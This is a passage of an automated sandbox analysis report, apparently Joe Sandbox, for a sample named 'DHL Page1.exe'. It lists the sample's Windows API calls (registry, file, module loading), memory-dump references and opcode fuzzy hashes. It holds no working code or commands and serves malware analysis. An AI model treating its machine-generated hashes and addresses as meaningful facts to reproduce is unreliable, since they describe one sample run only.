                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024CE
                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsv4331.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040256D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID:
                                              • API String ID: 3677997916-0
                                              • Opcode ID: 7c6eceb2e5823b15974c34d1093b08cbb70a1c9a4d1b4bc43721d62fcd546c51
                                              • Instruction ID: db3331748b387e0a23139b220d100322ea5e0004044d0e967d2a27da601b62a2
                                              • Opcode Fuzzy Hash: 7c6eceb2e5823b15974c34d1093b08cbb70a1c9a4d1b4bc43721d62fcd546c51
                                              • Instruction Fuzzy Hash: 31115171904205EADF14DFA0CA9C5AE77B4EF04385F21843FE142A72C0E7B89A85DB5D
                                              APIs
                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: 0188f32dca6e9b44003ceb63c839ea2dc67d46965eeb2905a0b3237adda5d8a4
                                              • Instruction ID: e07966a3b022dad6e9c8dcac79104d657900a9ac230a00e78faec187382892ea
                                              • Opcode Fuzzy Hash: 0188f32dca6e9b44003ceb63c839ea2dc67d46965eeb2905a0b3237adda5d8a4
                                              • Instruction Fuzzy Hash: 5901F431A242109BE7095B389D05B6A37A8E710315F10863FF955F66F1D778CC428B4C
                                              APIs
                                                • Part of subcall function 00402D5D: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402D85
                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AD
                                              • RegCloseKey.ADVAPI32(00000000), ref: 004023B6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: CloseDeleteOpenValue
                                              • String ID:
                                              • API String ID: 849931509-0
                                              • Opcode ID: dc04e2126df65ef1eab63fccb30ac189353dd4712f4d08d514386ad642d401af
                                              • Instruction ID: 2fd4d765ade6b53b90cd88198a899a3d6d05535282313d8f7fbe4cb70b164395
                                              • Opcode Fuzzy Hash: dc04e2126df65ef1eab63fccb30ac189353dd4712f4d08d514386ad642d401af
                                              • Instruction Fuzzy Hash: 09F0C233A04111ABEB10BBB49B8EAAE72699F40358F11443FF602B71C0C9FC4D428669
                                              APIs
                                              • ShowWindow.USER32(000103E2,?), ref: 00401587
                                              • ShowWindow.USER32(000103DC), ref: 0040159C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: ShowWindow
                                              • String ID:
                                              • API String ID: 1268545403-0
                                              • Opcode ID: 75ed275faa78da242368db297d494725143cc63fbeb4094f24fda5c6bd14ddad
                                              • Instruction ID: 2e0f50fdeb2f7dd90edf2f5a34716b03b89a0c73686732c384bd2138bd300ff1
                                              • Opcode Fuzzy Hash: 75ed275faa78da242368db297d494725143cc63fbeb4094f24fda5c6bd14ddad
                                              • Instruction Fuzzy Hash: 56E04F36B001049BCB14CFA8ED908AE77A6EB48325315083AD502B3690C6B5AD80CF68
                                              APIs
                                              • GetModuleHandleA.KERNEL32(?,00000020,?,004034D5,00000009), ref: 00406620
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0040663B
                                                • Part of subcall function 0040659E: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065B5
                                                • Part of subcall function 0040659E: wsprintfW.USER32 ref: 004065F0
                                                • Part of subcall function 0040659E: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406604
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                              • String ID:
                                              • API String ID: 2547128583-0
                                              • Opcode ID: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
                                              • Instruction ID: a1ed9263875628f5ed2014ebe32992016f75a5afd04a23dafca1611998df3493
                                              • Opcode Fuzzy Hash: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
                                              • Instruction Fuzzy Hash: F1E0863260422067D2509B759E0893762AC9ED9714302083EF946F2140DB789C329A6D
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(00000003,00402F18,C:\Users\user\Desktop\DHL Page1.exe,80000000,00000003), ref: 00405E0D
                                              • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405E2F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: File$AttributesCreate
                                              • String ID:
                                              • API String ID: 415043291-0
                                              • Opcode ID: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                              • Instruction ID: e98dd403a5e5432679a9d4e257ef455d3d6759c2e5ed6cf280caa05d5291d686
                                              • Opcode Fuzzy Hash: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                              • Instruction Fuzzy Hash: B3D09E71654601EFEF098F20DF16F2E7AA2EB84B00F11562CB682940E0DA7158199B19
                                              APIs
                                              • CreateDirectoryW.KERNELBASE(?,00000000,0040345F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403694), ref: 004058E5
                                              • GetLastError.KERNEL32 ref: 004058F3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: CreateDirectoryErrorLast
                                              • String ID:
                                              • API String ID: 1375471231-0
                                              • Opcode ID: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                              • Instruction ID: 374bdd7bc19fcd8113a2432eab3093b45824ff94ff1b8729b4d6be872bad36fb
                                              • Opcode Fuzzy Hash: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                              • Instruction Fuzzy Hash: 6DC04C31244B019AD6506B60DF087177954AB54781F158839A546E00A0DE348465EB2D
                                              APIs
                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402823
                                                • Part of subcall function 0040617B: wsprintfW.USER32 ref: 00406188
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: FilePointerwsprintf
                                              • String ID:
                                              • API String ID: 327478801-0
                                              • Opcode ID: 5636e1e78dddd1fcfcda9129bc1d9726c407c1e9b27ab1c7d440e1e4fec20889
                                              • Instruction ID: 1b184e92661537bb87de98d2befb21e1da1976e88d53c1f715dd780c7293573d
                                              • Opcode Fuzzy Hash: 5636e1e78dddd1fcfcda9129bc1d9726c407c1e9b27ab1c7d440e1e4fec20889
                                              • Instruction Fuzzy Hash: C7E0ED71A04104AEDB11DBA5AE49CAE77B8DB40318B11483BF502B50D1CBB949529A2D
                                              APIs
                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: PrivateProfileStringWrite
                                              • String ID:
                                              • API String ID: 390214022-0
                                              • Opcode ID: 196762a6526ae89b3abf44263c4053b82e560c8490a900e61fc9f6afa6b6512d
                                              • Instruction ID: 442d6135041436e14d88d5d309934ead45877352a2168de0e76fd2d1165917bb
                                              • Opcode Fuzzy Hash: 196762a6526ae89b3abf44263c4053b82e560c8490a900e61fc9f6afa6b6512d
                                              • Instruction Fuzzy Hash: 3FE086319085B66BE71036F10F8DABF10589B44385B14057FB612B71C3D9FC4D8242AD
                                              APIs
                                              • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: PathSearch
                                              • String ID:
                                              • API String ID: 2203818243-0
                                              • Opcode ID: 28370d6ec14c2864ce4c730428473a0f0cb9377b0d30d624432952373aa36a23
                                              • Instruction ID: 9aecaae10a8fa0ae14d0a9bfb73aa5550fc7421d408735c07da4fcd068d819ed
                                              • Opcode Fuzzy Hash: 28370d6ec14c2864ce4c730428473a0f0cb9377b0d30d624432952373aa36a23
                                              • Instruction Fuzzy Hash: 98E08072304104ABD710DF65DE49AAB7798DF5036CF20853AF613E60C1D6F49A41973D
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402D85
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: Open
                                              • String ID:
                                              • API String ID: 71445658-0
                                              • Opcode ID: b2e4f54b90f2ef0aa51ec1bc775a92caf8dba577625335006bca79b029b1dbad
                                              • Instruction ID: eaeeaa8b8a331aa3a09e344b0f7e4ee1109a300b49ea3f9035d81eb295fd1207
                                              • Opcode Fuzzy Hash: b2e4f54b90f2ef0aa51ec1bc775a92caf8dba577625335006bca79b029b1dbad
                                              • Instruction Fuzzy Hash: CAE08C76280108BFDB00EFA4EE4BFE937ECAB14744F008025B608EB0E1C674E5508BA8
                                              APIs
                                              • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0041EA30,00416A30,00403421,0040A230,0040A230,00403325,0041EA30,00004000,?,00000000,004031CF), ref: 00405EA0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                              • Instruction ID: 21ea84d6e30e3e1d6adabcf0c58a4e7f418a4fd28b3d755d78f19fcef630ff57
                                              • Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                              • Instruction Fuzzy Hash: 40E08C3220121AABEF119F65DC00AEB3B6CFF05361F004432F990E6280D630E9218BE4
                                              APIs
                                              • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0041AA23,00416A30,004033A5,00416A30,0041AA23,0A,0041EA30,00004000,?,00000000,004031CF), ref: 00405ECF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
